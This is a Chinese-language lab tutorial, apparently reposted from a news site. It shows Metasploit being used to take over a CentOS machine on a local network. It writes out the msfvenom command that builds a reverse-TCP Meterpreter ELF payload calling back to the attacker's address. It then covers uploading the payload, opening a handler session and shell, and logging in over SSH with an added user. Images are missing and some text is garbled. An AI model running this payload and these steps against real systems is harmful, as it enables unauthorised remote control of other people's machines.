| 关键词: Meterpreter 192.168 payload 主机 Linux exploit handler 00 reverse 类型 |
前言Meterpreter作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。 之前的文章《利用Metasploit渗透框架生成payload远程控制主机》展示了如何获得一台windows主机的控制权,今天我们来展示一下号称非常安全的Linux是如何被入侵的。 正常的渗透步骤应该首先进行信息手机,对特点目标进行扫描,今天掠过其他步骤直接针对一台主机进行渗透。 环境说明控制端:kali linux 192.168.10.6 被控端:Centos7.6 192.168.10.10 两台主机同处于同一个局域网内,互相可以ping通。 在控制端生成payload程序
以然使用linux主机meterpreter类型的反向tcp渗透控制程序。 #msfvenom -l payloads |grep 'linux/x64/meterpreter
msfvenom ﹑ linux/x64/meterpreter/reverse_tcp ┅list﹐ptions 主要设置: LHOST和LPORT ![]()
linux主机选择 “efl”格式 #root@kali:~# msfvenom --list formats ![]()
lhost:本地主机(攻击端) lport:本地端口(攻击端) -p :指定攻击载荷(远程控制程序)类型。 -f:输出的程序的类型,如elf/exe/apk等。 -o: 输入位置。 msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.10.6 lport=6666 -f elf -o /root/pay.elf 加上可执行权限 ![]()
这个步骤是最关键的,也是最困难的。一般的黑客都会利用各种办法将自己的木马文件上传到目标机器上。本次为了实验效果直接用常规办法上传:scp。 ![]() 开启主控端进行控制
root@kali:~# msfconsole ![]()
[root@test ~]# ./pay.elf &
看到“Meterpreter session 1 opened (192.168.10.6:6666 -> 192.168.10.10:49716)”表示成功连接上。 msf5 > use exploit/multi/handler 渗透成功后的“黑客操作”可以看都提示符编程了:“meterpreter >”
输入help可以查看可以进行哪些操作,包括文件的查看、上传、下载、新建、删除等。 ![]()
执行ls可以查看到被控端的当前目录文件: ![]() 和被控端主机上执行ls做对比:
执行一个“shell“命令可以开启一个shell会话,在这里可以执行任何的被控端主机的linux命令: ![]()
meterpreter > shell ![]()
在控制端再打开一个终端,用新建的用户远程登录被控端: 成功登录,大功告成!! root@kali:~# ssh [email protected] ![]() |
| 本文出处: https://www.toutiao.com/a6739456222426038795/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|